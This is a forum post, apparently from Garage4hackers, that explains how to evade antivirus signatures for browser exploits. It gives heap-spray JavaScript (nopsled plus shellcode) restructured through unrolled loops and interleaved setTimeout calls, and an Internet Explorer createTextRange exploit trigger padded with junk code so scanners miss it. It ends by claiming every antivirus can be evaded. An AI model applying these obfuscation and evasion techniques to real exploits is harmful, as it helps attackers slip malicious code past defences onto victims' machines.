Garage4hackers Forum - Evading AV Signatures...Derailing the Antivirus--

3. Long lasting Loops: essence of exploits: Again bad, bad strategy.

Loops can eat up resources like CPU and task schedular manager whenever sights the presence of any loop, it allocates more CPU time slice to the host process.
This is easiest signature for getting caught. Like this one in heap spray article.

Code:

for(i=0;i<1000;i++){spray[i]=nopsled+shellcode;}


This can be broken into smaller loops like:

for(i=0;i<100;i++){spray[i]=nopsled+shellcode;}

for(i=100;i<200;i++){spray[i]=nopsled+shellcode;}

---
---
---

for(i=950;i<1000;i++){spray[i] = nopsled + shellcode; }

But why should you use the loop, if you can do without it like:

Code:

var i = 0;
spray[i] = nopsled + shellcode;i++
spray[i] = nopsled + shellcode;i++
spray[i] = nopsled + shellcode;i++
spray[i] = nopsled + shellcode;i++

------
----
thousand lines of such code.

Otherwise:

Code:

spray[0] = nopsled + shellcode;
spray[1] = nopsled + shellcode;
spray[2] = nopsled + shellcode;
spray[3] = nopsled + shellcode;
---
---
---
spray[999] = nopsled + shellcode;

The best practice will be:

Code:

function somefunc() {
var somevar = document.cookie;
}
var vhold;
spray[0] = nopsled + shellcode;
vhold = setTimeout("somefunc()",50);
spray[1] = nopsled + shellcode;

and like that.

4. Followup code signature: This kind of strategy makes antivirus believe that an exploit
will always execute a certain fixed instruction. again bad-bad strategy.

E.g. most antivirus will detect following vulnerability:

Code:

<!--------------------->
<input type="checkbox" id='checkid'>
<script type=text/javascript language=javascript>
a=document.getElementById('checkid');
b=a.createTextRange();
</script>
<!--------------------->

But, if we'll insert some junk code into it, then same antivirus, will not detect it as a
threat as in following code:

Code:

<!--------------------->
<input type="checkbox" id='checkid'>
<script type=text/javascript language=javascript>
function doit() {
var asdragger = document.cookie + "hi all";
}
a=document.getElementById('checkid');
var grabit = setTimeout("doit()",1000);
var memc = navigator.appVersion;
b=a.createTextRange();
</script>
<!--------------------->

Employing all these techniques, u can also develop a code scrambler and after employing all these techniques
and further scrambling the The antivirus envasion is possible.

There exists more techniques, which if employed including all above listed countermeasures, all the antivirus
with even latest ever updates can also be evaded successfully. Just a little more research from urside is needed.

Thanx..."vinnu"

[COLOR="rgb(0, 0, 0)"]Download the Orginal Paper with its code in ".txt" format[/COLOR]